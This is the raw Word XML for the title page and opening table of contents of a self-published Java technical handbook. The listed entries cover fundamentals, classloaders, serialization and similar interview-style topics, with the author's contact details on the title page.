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DC22F" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F521E85" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1D0845" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A859EF5" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC26BD5" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCC5D1A" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="024F709B" w14:textId="77777777" w:rsidR="007F3063" w:rsidRPr="00CE4B95" w:rsidRDefault="007F3063" w:rsidP="007F3063">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7524FBAC" w14:textId="222A8A9B" w:rsidR="00432B90" w:rsidRPr="00CE4B95" w:rsidRDefault="003A781D" w:rsidP="00F42CEF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Technical Concepts Handbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDA3FE7" w14:textId="36F361A7" w:rsidR="00DD0541" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD0541" w:rsidP="00F42CEF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Siddhant Patni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4754CC" w14:textId="676C702C" w:rsidR="00DD0541" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD0541" w:rsidP="00F42CEF">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Mobile: +91-7588811796</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A31902D" w14:textId="10C16C82" w:rsidR="00A52AFE" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD0541" w:rsidP="00F42CEF">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Email: siddhant4patni@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551423CA" w14:textId="77777777" w:rsidR="00432B90" w:rsidRPr="00CE4B95" w:rsidRDefault="00432B90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-290517635"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="2DFF2DCD" w14:textId="71BD5740" w:rsidR="006C086A" w:rsidRPr="00CE4B95" w:rsidRDefault="006C086A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="725C069E" w14:textId="1DA9E177" w:rsidR="00012799" w:rsidRDefault="006C086A">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:szCs w:val="21"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc196307480" w:history="1">
            <w:r w:rsidR="00012799" w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java</w:t>
            </w:r>
            <w:r w:rsidR="00012799">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00012799">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00012799">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307480 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00012799">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00012799">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00012799">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F76E1F8" w14:textId="56147847" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307481" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java Fundamentals</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307481 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EC7C9A0" w14:textId="2B138BF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48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how to install java? Explain directories in it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307482 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="718ED37E" w14:textId="399A1D0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48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configure java in windows?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307483 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F5476D9" w14:textId="4BEB652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48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Java Program execution?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307484 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36600FDD" w14:textId="7F2FDE9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48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the byte stream in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307485 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E4D717F" w14:textId="3E18F2B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48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Classloader? Different types of it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307486 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C07D14F" w14:textId="10D6741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48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y is java more secure?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307487 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72F571B4" w14:textId="61C029F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48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public static void main (String[] args) method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307488 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D17F476" w14:textId="230ECFA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48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marker interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307489 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B0A2644" w14:textId="7E3A0C8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49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serialization and deserialization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307490 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F6AB88C" w14:textId="48D408D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49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use of the transient keyword in serialization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307491 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C36B563" w14:textId="659C35C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49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can I make below Employee class as Serializable class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307492 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59D991B2" w14:textId="1D0B146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493" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cstheme="minorHAnsi"/>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In above example, what if we have empId as static then what will happen at the time of serialization?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307493 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AB747E3" w14:textId="2FAA129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49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final class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
